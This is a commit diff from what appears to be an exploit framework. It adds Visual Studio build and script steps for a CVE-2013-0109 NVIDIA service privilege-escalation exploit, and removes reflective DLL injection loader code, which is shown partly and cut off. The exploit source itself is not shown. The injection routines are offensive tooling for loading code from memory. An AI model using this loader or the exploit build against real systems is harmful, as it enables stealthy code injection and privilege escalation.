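+<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+<SubSystem>Windows</SubSystem>
+<TargetMachine>MachineX86</TargetMachine>
+<ModuleDefinitionFile>
+</ModuleDefinitionFile>
+<AdditionalOptions>/ignore:4070</AdditionalOptions>
+</Link>
+<PostBuildEvent>
+<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL</Command>
+</PostBuildEvent>
+<ResourceCompile>
+<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+</ResourceCompile>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<ClCompile>
+<Optimization>MinSpace</Optimization>
+<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+<IntrinsicFunctions>false</IntrinsicFunctions>
+<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions)</PreprocessorDefinitions>
+<StringPooling>true</StringPooling>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+<FunctionLevelLinking>false</FunctionLevelLinking>
+<PrecompiledHeader>
+</PrecompiledHeader>
+<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
+<ObjectFileName>$(OutDir)\</ObjectFileName>
+<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
+<WarningLevel>Level3</WarningLevel>
+<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+<BufferSecurityCheck>false</BufferSecurityCheck>
+<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+</ClCompile>
+<Link>
+<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
+<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
+<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
+<GenerateDebugInformation>false</GenerateDebugInformation>
+<GenerateMapFile>true</GenerateMapFile>
+<MapFileName>$(OutDir)\nvidia_nvsvc.map</MapFileName>
+<SubSystem>Windows</SubSystem>
+<OptimizeReferences>
+</OptimizeReferences>
+<EnableCOMDATFolding>
+</EnableCOMDATFolding>
+<RandomizedBaseAddress>false</RandomizedBaseAddress>
+<DataExecutionPrevention>
+</DataExecutionPrevention>
+<ImportLibrary>$(OutDir)\nvidia_nvsvc.lib</ImportLibrary>
+<TargetMachine>MachineX86</TargetMachine>
+<Profile>false</Profile>
+<ModuleDefinitionFile>
+</ModuleDefinitionFile>
+<AdditionalOptions>/ignore:4070</AdditionalOptions>
+</Link>
+<PostBuildEvent>
+<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
+IF EXIST "..\..\..\..\..\data\exploits\CVE-2013-0109\" GOTO COPY
+mkdir "..\..\..\..\..\data\exploits\CVE-2013-0109\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2013-0109\"</Command>
+</PostBuildEvent>
+</ItemDefinitionGroup>
+<ItemGroup>
+<ClCompile Include="dllmain.c" />
+<ClCompile Include="nvidia_nvsvc.cpp" />
+</ItemGroup>
+<ItemGroup>
+<ClInclude Include="nvidia_nvsvc.h" />
+</ItemGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+<ImportGroup Label="ExtensionTargets">
+<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
+</ImportGroup>
+</Project>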
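--- a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj.filters
+++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj.filters
@@ -0,0 +1,10 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup>
+<ClCompile Include="nvidia_nvsvc.cpp" />
+<ClCompile Include="dllmain.c" />
+</ItemGroup>
+<ItemGroup>
+<ClInclude Include="nvidia_nvsvc.h" />
+</ItemGroup>
+</Project>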
@ -0,0 +1,152 @@
|
||||||
|
## Ignore Visual Studio temporary files, build results, and
|
||||||
|
## files generated by popular Visual Studio add-ons.
|
||||||
|
|
||||||
|
# User-specific files
|
||||||
|
*.suo
|
||||||
|
*.user
|
||||||
|
*.sln.docstates
|
||||||
|
|
||||||
|
# Build results
|
||||||
|
|
||||||
|
[Dd]ebug/
|
||||||
|
[Rr]elease/
|
||||||
|
x64/
|
||||||
|
build/
|
||||||
|
[Bb]in/
|
||||||
|
[Oo]bj/
|
||||||
|
|
||||||
|
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
|
||||||
|
!packages/*/build/
|
||||||
|
|
||||||
|
# MSTest test Results
|
||||||
|
[Tt]est[Rr]esult*/
|
||||||
|
[Bb]uild[Ll]og.*
|
||||||
|
|
||||||
|
*_i.c
|
||||||
|
*_p.c
|
||||||
|
*.ilk
|
||||||
|
*.meta
|
||||||
|
*.obj
|
||||||
|
*.pch
|
||||||
|
*.pdb
|
||||||
|
*.pgc
|
||||||
|
*.pgd
|
||||||
|
*.rsp
|
||||||
|
*.sbr
|
||||||
|
*.tlb
|
||||||
|
*.tli
|
||||||
|
*.tlh
|
||||||
|
*.tmp
|
||||||
|
*.tmp_proj
|
||||||
|
*.log
|
||||||
|
*.vspscc
|
||||||
|
*.vssscc
|
||||||
|
.builds
|
||||||
|
*.pidb
|
||||||
|
*.log
|
||||||
|
*.scc
|
||||||
|
|
||||||
|
# Visual C++ cache files
|
||||||
|
ipch/
|
||||||
|
*.aps
|
||||||
|
*.ncb
|
||||||
|
*.opensdf
|
||||||
|
*.sdf
|
||||||
|
*.cachefile
|
||||||
|
|
||||||
|
# Visual Studio profiler
|
||||||
|
*.psess
|
||||||
|
*.vsp
|
||||||
|
*.vspx
|
||||||
|
|
||||||
|
# Guidance Automation Toolkit
|
||||||
|
*.gpState
|
||||||
|
|
||||||
|
# ReSharper is a .NET coding add-in
|
||||||
|
_ReSharper*/
|
||||||
|
*.[Rr]e[Ss]harper
|
||||||
|
|
||||||
|
# TeamCity is a build add-in
|
||||||
|
_TeamCity*
|
||||||
|
|
||||||
|
# DotCover is a Code Coverage Tool
|
||||||
|
*.dotCover
|
||||||
|
|
||||||
|
# NCrunch
|
||||||
|
*.ncrunch*
|
||||||
|
.*crunch*.local.xml
|
||||||
|
|
||||||
|
# Installshield output folder
|
||||||
|
[Ee]xpress/
|
||||||
|
|
||||||
|
# DocProject is a documentation generator add-in
|
||||||
|
DocProject/buildhelp/
|
||||||
|
DocProject/Help/*.HxT
|
||||||
|
DocProject/Help/*.HxC
|
||||||
|
DocProject/Help/*.hhc
|
||||||
|
DocProject/Help/*.hhk
|
||||||
|
DocProject/Help/*.hhp
|
||||||
|
DocProject/Help/Html2
|
||||||
|
DocProject/Help/html
|
||||||
|
|
||||||
|
# Click-Once directory
|
||||||
|
publish/
|
||||||
|
|
||||||
|
# Publish Web Output
|
||||||
|
*.Publish.xml
|
||||||
|
*.pubxml
|
||||||
|
|
||||||
|
# NuGet Packages Directory
|
||||||
|
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
|
||||||
|
#packages/
|
||||||
|
|
||||||
|
# Windows Azure Build Output
|
||||||
|
csx
|
||||||
|
*.build.csdef
|
||||||
|
|
||||||
|
# Windows Store app package directory
|
||||||
|
AppPackages/
|
||||||
|
|
||||||
|
# Others
|
||||||
|
sql/
|
||||||
|
*.Cache
|
||||||
|
ClientBin/
|
||||||
|
[Ss]tyle[Cc]op.*
|
||||||
|
~$*
|
||||||
|
*~
|
||||||
|
*.dbmdl
|
||||||
|
*.[Pp]ublish.xml
|
||||||
|
*.pfx
|
||||||
|
*.publishsettings
|
||||||
|
|
||||||
|
# RIA/Silverlight projects
|
||||||
|
Generated_Code/
|
||||||
|
|
||||||
|
# Backup & report files from converting an old project file to a newer
|
||||||
|
# Visual Studio version. Backup files are not needed, because we have git ;-)
|
||||||
|
_UpgradeReport_Files/
|
||||||
|
Backup*/
|
||||||
|
UpgradeLog*.XML
|
||||||
|
UpgradeLog*.htm
|
||||||
|
|
||||||
|
# SQL Server files
|
||||||
|
App_Data/*.mdf
|
||||||
|
App_Data/*.ldf
|
||||||
|
|
||||||
|
# =========================
|
||||||
|
# Windows detritus
|
||||||
|
# =========================
|
||||||
|
|
||||||
|
# Windows image file caches
|
||||||
|
Thumbs.db
|
||||||
|
ehthumbs.db
|
||||||
|
|
||||||
|
# Folder config file
|
||||||
|
Desktop.ini
|
||||||
|
|
||||||
|
# Recycle Bin used on file shares
|
||||||
|
$RECYCLE.BIN/
|
||||||
|
|
||||||
|
# Mac crap
|
||||||
|
.DS_Store
@ -26,6 +26,13 @@ PUSHD CVE-2010-0232
|
||||||
msbuild.exe make.msbuild /target:%PLAT%
|
msbuild.exe make.msbuild /target:%PLAT%
|
||||||
POPD
|
POPD
|
||||||
|
|
||||||
|
IF "%ERRORLEVEL%"=="0" (
|
||||||
|
ECHO "Building CVE-2013-0109 (nvidia_nvsvc)"
|
||||||
|
PUSHD CVE-2013-0109
|
||||||
|
msbuild.exe make.msbuild /target:%PLAT%
|
||||||
|
POPD
|
||||||
|
)
|
||||||
|
|
||||||
IF "%ERRORLEVEL%"=="0" (
|
IF "%ERRORLEVEL%"=="0" (
|
||||||
ECHO "Building CVE-2013-3660 (ppr_flatten_rec)"
|
ECHO "Building CVE-2013-3660 (ppr_flatten_rec)"
|
||||||
PUSHD CVE-2013-3660
|
PUSHD CVE-2013-3660
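Review bot: The new guarded block runs `msbuild.exe make.msbuild /target:%PLAT%` inside `PUSHD CVE-2013-0109`, but the only CVE-2013-0109 files visible in this commit are the .vcxproj, its .filters and a .gitignore; if `CVE-2013-0109\make.msbuild` is not added elsewhere in the commit, that msbuild call fails and every later `IF "%ERRORLEVEL%"=="0" (` step is skipped. The block is otherwise a verbatim copy of its neighbours (ECHO, PUSHD, msbuild, POPD), so a `CALL :build CVE-2013-0109 nvidia_nvsvc` subroutine taking the directory and label would keep each per-exploit step to one line and stop the pattern from being re-pasted on the next addition. The file header of this section is outside the view, so the script name is not confirmed here.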
@ -0,0 +1,152 @@
|
||||||
|
## Ignore Visual Studio temporary files, build results, and
|
||||||
|
## files generated by popular Visual Studio add-ons.
|
||||||
|
|
||||||
|
# User-specific files
|
||||||
|
*.suo
|
||||||
|
*.user
|
||||||
|
*.sln.docstates
|
||||||
|
|
||||||
|
# Build results
|
||||||
|
|
||||||
|
[Dd]ebug/
|
||||||
|
[Rr]elease/
|
||||||
|
x64/
|
||||||
|
build/
|
||||||
|
[Bb]in/
|
||||||
|
[Oo]bj/
|
||||||
|
|
||||||
|
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
|
||||||
|
!packages/*/build/
|
||||||
|
|
||||||
|
# MSTest test Results
|
||||||
|
[Tt]est[Rr]esult*/
|
||||||
|
[Bb]uild[Ll]og.*
|
||||||
|
|
||||||
|
*_i.c
|
||||||
|
*_p.c
|
||||||
|
*.ilk
|
||||||
|
*.meta
|
||||||
|
*.obj
|
||||||
|
*.pch
|
||||||
|
*.pdb
|
||||||
|
*.pgc
|
||||||
|
*.pgd
|
||||||
|
*.rsp
|
||||||
|
*.sbr
|
||||||
|
*.tlb
|
||||||
|
*.tli
|
||||||
|
*.tlh
|
||||||
|
*.tmp
|
||||||
|
*.tmp_proj
|
||||||
|
*.log
|
||||||
|
*.vspscc
|
||||||
|
*.vssscc
|
||||||
|
.builds
|
||||||
|
*.pidb
|
||||||
|
*.log
|
||||||
|
*.scc
|
||||||
|
|
||||||
|
# Visual C++ cache files
|
||||||
|
ipch/
|
||||||
|
*.aps
|
||||||
|
*.ncb
|
||||||
|
*.opensdf
|
||||||
|
*.sdf
|
||||||
|
*.cachefile
|
||||||
|
|
||||||
|
# Visual Studio profiler
|
||||||
|
*.psess
|
||||||
|
*.vsp
|
||||||
|
*.vspx
|
||||||
|
|
||||||
|
# Guidance Automation Toolkit
|
||||||
|
*.gpState
|
||||||
|
|
||||||
|
# ReSharper is a .NET coding add-in
|
||||||
|
_ReSharper*/
|
||||||
|
*.[Rr]e[Ss]harper
|
||||||
|
|
||||||
|
# TeamCity is a build add-in
|
||||||
|
_TeamCity*
|
||||||
|
|
||||||
|
# DotCover is a Code Coverage Tool
|
||||||
|
*.dotCover
|
||||||
|
|
||||||
|
# NCrunch
|
||||||
|
*.ncrunch*
|
||||||
|
.*crunch*.local.xml
|
||||||
|
|
||||||
|
# Installshield output folder
|
||||||
|
[Ee]xpress/
|
||||||
|
|
||||||
|
# DocProject is a documentation generator add-in
|
||||||
|
DocProject/buildhelp/
|
||||||
|
DocProject/Help/*.HxT
|
||||||
|
DocProject/Help/*.HxC
|
||||||
|
DocProject/Help/*.hhc
|
||||||
|
DocProject/Help/*.hhk
|
||||||
|
DocProject/Help/*.hhp
|
||||||
|
DocProject/Help/Html2
|
||||||
|
DocProject/Help/html
|
||||||
|
|
||||||
|
# Click-Once directory
|
||||||
|
publish/
|
||||||
|
|
||||||
|
# Publish Web Output
|
||||||
|
*.Publish.xml
|
||||||
|
*.pubxml
|
||||||
|
|
||||||
|
# NuGet Packages Directory
|
||||||
|
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
|
||||||
|
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
# =========================
# Windows detritus
# =========================
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store
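--- a/PATH_NOT_SHOWN_ON_PAGE_1
+++ /dev/null
@@ -1,131 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "LoadLibraryR.h"
-//===============================================================================================//
-DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
-{
-WORD wIndex = 0;
-PIMAGE_SECTION_HEADER pSectionHeader = NULL;
-PIMAGE_NT_HEADERS pNtHeaders = NULL;
-
-pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
-
-pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
-
-if( dwRva < pSectionHeader[0].PointerToRawData )
-return dwRva;
-
-for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
-{
-if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
-return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
-}
-
-return 0;
-}
-//===============================================================================================//
-DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
-{
-UINT_PTR uiBaseAddress = 0;
-UINT_PTR uiExportDir = 0;
-UINT_PTR uiNameArray = 0;
-UINT_PTR uiAddressArray = 0;
-UINT_PTR uiNameOrdinals = 0;
-DWORD dwCounter = 0;
-#ifdef _WIN64
-DWORD dwMeterpreterArch = 2;
-#else
-DWORD dwMeterpreterArch = 1;
-#endif
-
-uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
-
-// get the File Offset of the modules NT Header
-uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
-// currenlty we can only process a PE file which is the same type as the one this fuction has
-// been compiled as, due to various offset in the PE structures being defined at compile time.
-if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
-{
-if( dwMeterpreterArch != 1 )
-return 0;
-}
-else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
-{
-if( dwMeterpreterArch != 2 )
-return 0;
-}
-else
-{
-return 0;
-}
-
-// uiNameArray = the address of the modules export directory entry
-uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
-// get the File Offset of the export directory
-uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
-
-// get the File Offset for the array of name pointers
-uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
-
-// get the File Offset for the array of addresses
-uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
-
-// get the File Offset for the array of name ordinals
-uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );
-
-// get a counter for the number of exported functions...
-dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
-
-// loop through all the exported functions to find the ReflectiveLoader
-while( dwCounter-- )
-{
-char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
-
-if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
-{
-// get the File Offset for the array of addresses
-uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
-
-// use the functions name ordinal as an index into the array of name pointers
-uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
-// return the File Offset to the ReflectiveLoader() functions code...
-return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
-}
-// get the next exported function name
-uiNameArray += sizeof(DWORD);
-
-// get the next exported function name ordinal
-uiNameOrdinals += sizeof(WORD);
-}
-
-return 0;
-}
-//===============================================================================================//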
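--- a/PATH_NOT_SHOWN_ON_PAGE_2
+++ /dev/null
@@ -1,37 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _VNCDLL_LOADER_LOADLIBRARYR_H
-#define _VNCDLL_LOADER_LOADLIBRARYR_H
-//===============================================================================================//
-#include "ReflectiveDLLInjection.h"
-
-DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
-
-//===============================================================================================//
-#endif
-//===============================================================================================//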
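--- a/PATH_NOT_SHOWN_ON_PAGE_3
+++ /dev/null
@@ -1,53 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
-#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include <windows.h>
-
-// we declare some common stuff in here...
-
-#define DLL_METASPLOIT_ATTACH 4
-#define DLL_METASPLOIT_DETACH 5
-#define DLL_QUERY_HMODULE 6
-
-#define DEREF( name )*(UINT_PTR *)(name)
-#define DEREF_64( name )*(DWORD64 *)(name)
-#define DEREF_32( name )*(DWORD *)(name)
-#define DEREF_16( name )*(WORD *)(name)
-#define DEREF_8( name )*(BYTE *)(name)
-
-typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
-typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
-
-#define DLLEXPORT __declspec( dllexport )
-
-//===============================================================================================//
-#endif
-//===============================================================================================//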
@ -1,451 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "ReflectiveLoader.h"
//===============================================================================================//
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
HINSTANCE hAppInstance = NULL;
//===============================================================================================//
#ifdef _WIN64
#pragma intrinsic( _ReturnAddress )
UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
#endif
//===============================================================================================//
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
// otherwise the DllMain at the end of this file will be used.
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
// This is our position independent reflective DLL loader/injector
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
#else
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
#endif
{
// the functions we need
LOADLIBRARYA pLoadLibraryA;
GETPROCADDRESS pGetProcAddress;
VIRTUALALLOC pVirtualAlloc;
USHORT usCounter;
// the initial location of this image in memory
UINT_PTR uiLibraryAddress;
// the kernels base address and later this images newly loaded base address
UINT_PTR uiBaseAddress;
// variables for processing the kernels export table
UINT_PTR uiAddressArray;
UINT_PTR uiNameArray;
UINT_PTR uiExportDir;
UINT_PTR uiNameOrdinals;
DWORD dwHashValue;
// variables for loading this image
UINT_PTR uiHeaderValue;
UINT_PTR uiValueA;
UINT_PTR uiValueB;
UINT_PTR uiValueC;
UINT_PTR uiValueD;
// STEP 0: calculate our images current base address
// we will start searching backwards from our current EIP
#ifdef _WIN64
uiLibraryAddress = eip();
#else
__asm call geteip
__asm geteip: pop uiLibraryAddress
#endif
// loop through memory backwards searching for our images base address
// we dont need SEH style search as we shouldnt generate any access violations with this
while( TRUE )
{
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
{
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
{
uiHeaderValue += uiLibraryAddress;
// break if we have found a valid MZ/PE header
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
break;
}
}
uiLibraryAddress--;
}
